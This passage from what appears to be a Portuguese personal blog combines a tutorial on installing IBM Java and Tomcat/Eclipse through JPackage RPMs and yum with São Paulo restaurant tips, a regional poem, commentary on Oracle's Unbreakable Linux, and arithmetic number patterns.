  4. Fomos para http://ibm.com/developerworks/java/jdk/linux/download.html, nos registramos, escolhemos baixar a SDK 1.5 (que é a versão do RPM) em formato tar-gzip (tgz). Tivemos que baixar também a biblioteca javacomm do mesmo lugar. No fim copiamos tudo para o diretório de fontes para RPMs assim:
    bash# cd /diretorio/onde/baixei/SDK
    bash# cp ibm-java2-sdk-50-linux-i386.tgz /usr/src/redhat/SOURCES
    bash# cp ibm-java2-javacomm-50-linux-i386.tgz /usr/src/redhat/SOURCES

    No SUSE, copie para /usr/src/rpm/SOURCES.

  5. Construimos os pacotes finais com este simples comando:
    bash# cd /diretorio/onde/baixei/nosrc.rpm
    bash# rpmbuild –rebuild java*nosrc.rpm

    e vimos uma série de coisas acontecendo: é a construção do pacote.

  6. Quando terminou, encontramos todos os pacotes gerados em /usr/src/redhat/RPMS/i386. Instalamos todos assim:
    bash# cd /usr/src/redhat/RPMS/i386
    bash# rpm -Uvh java*ibm*rpm

    e a JVM da IBM está instalada.

O padrão JPackage definiu que a JVM deve ser a soma de uma série de sub-pacotes, todos com nome padronizado, e os que geramos neste exemplo são:

java-1.5.0-ibm-1.5.0.2.3-3jpp.i386.rpm A JRE mínima. É o pacote básico que você deve instalar.
java-1.5.0-ibm-alsa-1.5.0.2.3-3jpp.i386.rpm Suporte a arquitetura de audio ALSA do Linux.
java-1.5.0-ibm-plugin-1.5.0.2.3-3jpp.i386.rpm Java Plugin para os browsers Mozilla e Firefox. Não obrigatório.
java-1.5.0-ibm-devel-1.5.0.2.3-3jpp.i386.rpm O compilador Java e a SDK. Instale-o se você vai programar em Java.
java-1.5.0-ibm-src-1.5.0.2.3-3jpp.i386.rpm Fontes de programas em Java, para estudo e teste.
java-1.5.0-ibm-jdbc-1.5.0.2.3-3jpp.i386.rpm Driver JDBC genérico para o unixODBC genérico. Não é necessário se você vai usar o driver JDBC de seu banco de dados.
java-1.5.0-ibm-demo-1.5.0.2.3-3jpp.i386.rpm Alguns programas demo. Não é obrigatório.
java-1.5.0-ibm-javacomm-1.5.0.2.3-3jpp.i386.rpm Java Communications API para Linux.

No JPackage há modelos de empacotamento (src.rpm) das JVMs da IBM, Sun, BEA e Blackdown. Para instalar qualquer uma delas, você terá que construir o RPM como demonstramos aqui.

A diferença entre elas está no nome do RPM (“ibm�?, “sun�?, “blackdown�?), e você pode ter instalado em seu sistema JVMs de vários fornecedores simultaneamente. Os RPMs de todos os fornecedores, segundo o padrão JPackage, obedecem esta mesma convenção de nomes de sub-pacotes.

permalink Instale Outros Softwares Java que Não Tem Fonte

Será necessário instalar outros RPMs sem fonte para usar corretamente outros pacotes populares do JPackage. Tentanto instalar o tomcat, verificamos que ele necessita do JTA, que é uma API de transações.

Então repetimos os conceitos do passo anterior:

  1. Começamos em http://jpackage.org
  2. Procuramos e baixamos o nosrc.rpm da JTA. A última vez que olhamos estava em http://mirrors.dotsrc.org/jpackage/1.6/generic/non-free/SRPMS/jta-1.0.1-0.b.4jpp.nosrc.rpm
  3. Consultamos o pacote (ou as infos sobre o pacote em jpackage.org) para descobrir de onde se baixa a JTA, com comando rpm, e descobrimos que precisamos procurar em http://java.sun.com/products/jta/.
  4. Desta vez, tivemos que baixar dois ZIPs: o de classes e o de documentação. E copiamos ambos para o diretórios de fontes de RPM
    bash# cd /diretorio/onde/baixei/JTA
    bash# cp jta*-classes.zip jta*-doc.zip /usr/src/redhat/SOURCES
  5. Construimos os pacotes finais e instalamos os RPMs gerados:
    bash# cd /diretorio/onde/baixei/nosrc.rpm
    bash# rpmbuild –rebuild jta*nosrc.rpm
    bash# cd /usr/src/redhat/RPMS/noarch
    bash# rpm -Uvh jta*rpm

    E a JTA está instalada.

permalink Instalando outros Softwares Java pelo JPackage

Neste ponto, você já tem o repositório JPackage configurado no seu sistema, e a JVM de sua escolha instalada conforme ditam os padrões FHS de diretórios do Linux.

Agora é muito fácil instalar qualquer outra aplicação, biblioteca ou JAR disponível no JPackage, representado pelo nome do pacote na lista a esquerda em http://www.jpackage.org.

Para instalar ou atualizar um pacote, bastam os seguintes comandos respectivamente:

bash# yum install [nome do pacote]    # Para   instalar.
bash# yum update [nome do pacote]     # Para atualizar.

O YUM, usando os metadados do repositório, vai resolver todas as dependências, baixar tudo que for necessário, e instalar os pacotes.

permalink Exemplo: Instalando o Apache Tomcat

O Apache Tomcat é um servlet container, que se integra ao webserver e permite a criação e execução de aplicações web feitas em Java (servlets).

Para instalar o Tomcat, segundo nosso exemplo anterior, basta:

bash# yum install tomcat5

Após resolver todas as dependências, o YUM determinou que para instalar o Tomcat, seria necessário instalar também vários módulos do Jakarta, Axis, módulos de XML, etc. E tudo foi automaticamente baixado e instalado num mesmo passo.

permalink Instalando o Eclipse

O Eclipse foi a princípio uma poderosa ferramenta de desenvolvimento de aplicações, ou IDE.

Desde a versão 3, ele foi reestruturado para ser um “servidor de aplicações�? de desktop. Ou seja, se tornou o que chamamos de Rich Client Platform — ou RCP — que é uma base genérica que provê a infraestrutura padronizada que qualquer aplicação de desktop precisa. O IDE então passou a ser uma aplicação, um plugin, do RCP. O IDE Java está no JPackage com o nome de eclipse-jdt, e para instala-lo, basta:

bash# yum install eclipse-jdt

Como sempre, todos os outros módulos necessário para estes componentes serão automaticamente selecionados e instalados.

O ícone do Eclipse deve aparecer no menu inicial, pronto para ser usado.

Curtindo a Vida em São Paulo

Um colega que está se mudando para São Paulo me pediu umas dicas de lugares para levar sua namorada. Mandei esta lista para ele:

  1. Insalata (Al. Campinas, perto da Estados Unidos)
    É bonito, descoladinho e tem todos os tipos de comida, com destaque a ótimas saladas.
  2. Sargento (Al. Pamplona)
    Vai lá só para comer a saladona, que é ótima e sustenta. Peça a pequena.
    Ou então aproveite as massas que estão entre as melhores de SP.
  3. Nello’s (R. Antonio Bicudo entre R. Pinheiros e Artur de Azevedo)
    Barato, tradicional e ótimo. Peça a panzanella de entrada, e depois castigue uma massa. Eu adoro.
  4. Piratininga Bar (R. Wizard, na Vila Madalena)
    É aquele bar que te falei para marcar gol. É bonito, tem piano e sax ao vivo, e uns petiscos sem vergonha. Tem que chegar cedo pq é pequeno, e tenta ficar na parte superior, perto do piano. Tem o Pira Grill ao lado que é mais para comer, e é menos romântico.
  5. Acrópoles (fica em alguma rua do Bom Retiro)
    É um restaurente grego supertradicional e simples. É interessante pq nos finais de semana o Bom Retiro é um bairro morto, com todas as lojas fechadas mas as pessoas bombam na frente do restaurante (mas sempre tem lugar). Um bom programa é ir na Pinacoteca de manhã e depois almoçar lá, que é perto. Pode-se também ir comprar roupa feminina no bairro (vc vai ter que ter paciência) de sábado (até as 12:00, pq depois tudo morre) e depois castigar o grego.
  6. Restaurante do Museu da Casa Brasileira (Av. Faria Lima quase com a Av. Cidade Jardim)
    Este lugar é lindo. O negócio é ir lá domingo umas 10:00 da manhã, assistir o concerto de jazz de graça, dar uma volta no museu (que é pequeno) e ficar para o almoço. Tem um jardim bonito e o restaurente fica de frente para ele. Vale mais pelo programa do que pela comida.
  7. Jardim Aurélia (Rua Tabapuã, 838, no Itaim)
    É um restaurante grande que comprou todas as casas de uma vilinha, então as mesas ficam meio a céu aberto. Self-service de tudo, e a noite vira uma pizzaria razoável.
  8. Sorveteria Ofelê (Al. Lorena com Bela Cintra)
    Dá uma passeada nos Jardins, e toma um sorvete nessa melhor sorveteria de São Paulo.
  9. Senzala (Pça Pan Americana)
    Retaurante tem-de-tudo, com algumas mesas a céu aberto, e vista p/ a praça. Eu gosto do sanduiche de atum, que é bem servido e bom.
  10. Speranza (Av. 13 de Maio quase esquina com a Brigadeiro Luiz Antonio, embaixo do viaduto)
    A melhor pizzaria de São Paulo. Tem que pedir a pizza de marguerita que é inacreditável.
  11. Maha Mantra (Fradique Coutinho perto do Galinheiro)
    O melhor restaurante vegetariano do mundo. É muito barato e é boa opção também para os carnívoros.
  12. Deli Paris (R. Harmonia com Wizard, na Vila Madalena, perto do Piratininga)
    Boulangerie francesa com café da manhã self-service bom, barato e descolado. Dá para almoçar lá tb, tipo quiche com salada etc.

Para os vegetarianos, tenho esta lista de todos os restaurantes VGs de São Paulo.

Gaia Gourmet Vegetariano

Finalmente consegui almoçar no Gaia, marcando um almoço informal com o pessoal do trabalho.

A marioria dos restaurantes vegetarianos são self-service-coma-a-vontade com buffet de saladas e quentes, bem normal. O Gaia não. Lá as porções vem naqueles pratos bem montados e bonitos dos restaurantes mais elegantes.

E não é só visual. É tudo muito saboroso, muito bem temperado.

Eu por exemplo pedi um panqueca de ricota com risoto de quinua e abóbora, de sabores inusitados. Alguns pediram a outra opção: fusili al dente marinado com vegetais. Olhei a massa que não parecia prometer muito, mas que me disseram que estava ótima. Não resisti e provei também, e me surpreendi.

O Gaia Gourmet Vegetariano é um presente para São Paulo. Levaria lá até aqueles amigos gourmets mais carnívoros. E além de tudo, não é caro: R$15 por pessoa.

Entrou na lista dos meus restaurantes preferidos.

Cantá

Cantá seja lá cumu fô
Si a dô fô mais grandi qui o peito
Cantá bem mais forte qui a dô

Cantá pru mor da aligria
Tomém pru mor da triteza,
Cantano é qui a natureza
Insina os ome a cantá

Cantá sintino sodade
Qui dexa as marca di verga
Di arguém qui os óio num vê
I o coração inda inxerga

Cantá coieno as coieta
Ou qui nem bigorna no maio
Qui canto bão de iscuitá
É o som na minhã di trabaio

Cantá cumu quem dinuncia
A pió injustiça da vida:
A fomi i as panela vazia
Nus lá qui num tem mais cumida

Cantá nossa vida i a roça
Nas quar germina as semente,
As qui dão fruto na terra
I as qui dão fruto na gente

Cantá as caboca cum jeito,
Cum viola i catiguria
Si elas cantá nu seu peito
Num tem cantá qui alivia

Cantá pru mor dispertá
U amor qui bati i consola
Pontiano dentro da gente
Um coração di viola

Cantá cum muitos amigos
Qui a vida canta mio
É im bando qui os passarim
Cantano disperta o só

Cantá, cantá sempri mais:
Di tardi, di noiti i di dia
Cantá, cantá qui a paiz
Carece de mais cantoria

Cantá seja lá cumu fô
Si a dô fô mais grandi qui o peito,
Cantá bem mais forti qui a dô

Autoria de Gildes Bezerra.

Escrito como uma resposta a um cartão de fim-de-ano de Rolando Boldrin. Mais detalhes pelo próprio autor.

Unbreakable Linux: Mais uma Distribuição Enterprise

A Oracle anunciou a distribuição Unbreakable Linux na semana passada. Ela será tecnicamente idêntica ao Red Hat Enterprise Linux (RHEL), com excessão da logotipagem e trademarks da Red Hat, incluindo — conforme anunciado — um suporte de preço inferior ao da Red Hat.

Unbrekble LinuxO mercado ainda não entendeu o que este passo significa, e muitos interpretaram (e celebraram) como um suporte mais amplo ao RHEL por parte da Oracle. Na verdade a Red Hat se pronunciou em seu Unfakeable Linux.

Por que copiar o Red Hat Enterprise Linux? Porque é uma distribuição muito popular e porque desde sempre foi desenhada para ser genérica, ou seja, é muito fácil tirar a logotipagem da Red Hat e colocar o seu próprio nome. O resultado é uma distribuição idêntica (bit a bit) ao Red Hat Enterprise Linux (com exceção dos logotipos), e que se comporta exatamente da mesma forma que o RHEL se comportaria ao interagir com diversos hardwares e softwares: a compatibilidade do hardware e software catalog da Red Hat é tecnicamente herdada, mas não leva o carimbo formal de certificação da Red Hat.

Essa idéia não é nova e outras iniciativas já faziam isso antes: WhiteBox, CentOS, Scientific Linux. Isso é possível graças a tecnologia Open Source chamada RPM que “documenta” numa linguagem de máquina todo o processo de compilação, integração e instalação dos softwares, a ponto de ser facilmente reproduzivel em qualquer ambiente. Já havia explicado este processo antes a partir deste slide, nesta apresentação.

Como o software é idêntico, os bugs também são herdados, e é ai que começa o problema. As iniciativas sem suporte (CentOS etc) declaravam em alto e bom som que não fornecem suporte, e por isso não tem nenhum vínculo de responsabilidade com seus usuários. Elas podem se dar ao luxo de esperar a Red Hat lançar uma atualização para só depois se atualizarem.

No caso de um contrato de suporte comercial da Oracle, ela terá um cliente impaciente do outro lado da linha que quer ter seu problema técnico resolvido. O luxo da espera não existe mais, e a Oracle terá que resolver os bugs por si só.

Na pior das hipóteses, ao longo do tempo é possível que o Unbreakable comece a divergir tecnicamente do RHEL, mesmo tendo a Oracle um desejo latente de sempre se sincronizar com o RHEL — conforme anunciado. E teremos uma terceira distribuição Enterprise forte. Foi assim que nasceram algumas distribuições, como Conectiva e Mandrake, que no começo eram basicamente uma cópia traduzida do Red Hat (não enterprise) Linux. Mas hoje o ecossistema de Linux é bem diferente do da época em que essas distribuições surgiram.

Arrisco também um palpite favorecendo uma hipótese bem melhor, onde o Unbreakable e o RHEL continuarão idênticos e sincronizados, cooperando entre sí como verdadeiros projetos Open Source. E ao longo do tempo o RHEL realizará a façanha inédita de consolidar um sabor universal de Linux corporativo. Coisa que o Linux Standard Base está longe de conseguir.

Só o tempo dirá, e é essa constante incerteza a maior inimiga de uma adoção em massa de Linux no mundo corporativo.

Cabe aqui uma salva de palmas para a Oracle que teve a coragem de inovar comercialmente sobre algo que já era tecnicamente e legalmente possível.

Mágica dos Decimais

Multiplique 37 por múltiplos de 3:
3 x 37 = 111
6 x 37 = 222
9 x 37 = 333
12 x 37 = 444
15 x 37 = 555
18 x 37 = 666
21 x 37 = 777
24 x 37 = 888
27 x 37 = 999

Trapézio:
1 x 9 + 2 = 11
12 x 9 + 3 = 111
123 x 9 + 4 = 1111
1234 x 9 + 5 = 11111
12345 x 9 + 6 = 111111
123456 x 9 + 7 = 1111111
1234567 x 9 + 8 = 11111111
12345678 x 9 + 9 = 111111111

Outro Trapézio:
1 x 8 + 1 = 9
12 x 8 + 2 = 98
123 x 8 + 3 = 987
1234 x 8 + 4 = 9876
12345 x 8 + 5 = 98765
123456 x 8 + 6 = 987654
1234567 x 8 + 7 = 9876543
12345678 x 8 + 8 = 98765432
123456789 x 8 + 9 = 987654321

E mais outro:
0 x 9 + 8 = 8
9 x 9 + 7 = 88
98 x 9 + 6 = 888
987 x 9 + 5 = 8888
9876 x 9 + 4 = 88888
98765 x 9 + 3 = 888888
987654 x 9 + 2 = 8888888
9876543 x 9 + 1 = 88888888
98765432 x 9 + 0 = 888888888
987654321 x 9 - 1 = 8888888888
9876543210 x 9 - 2 = 88888888888

Conta bonita:
111.111.111 x 111.111.111 = 12.345.678.987.654.321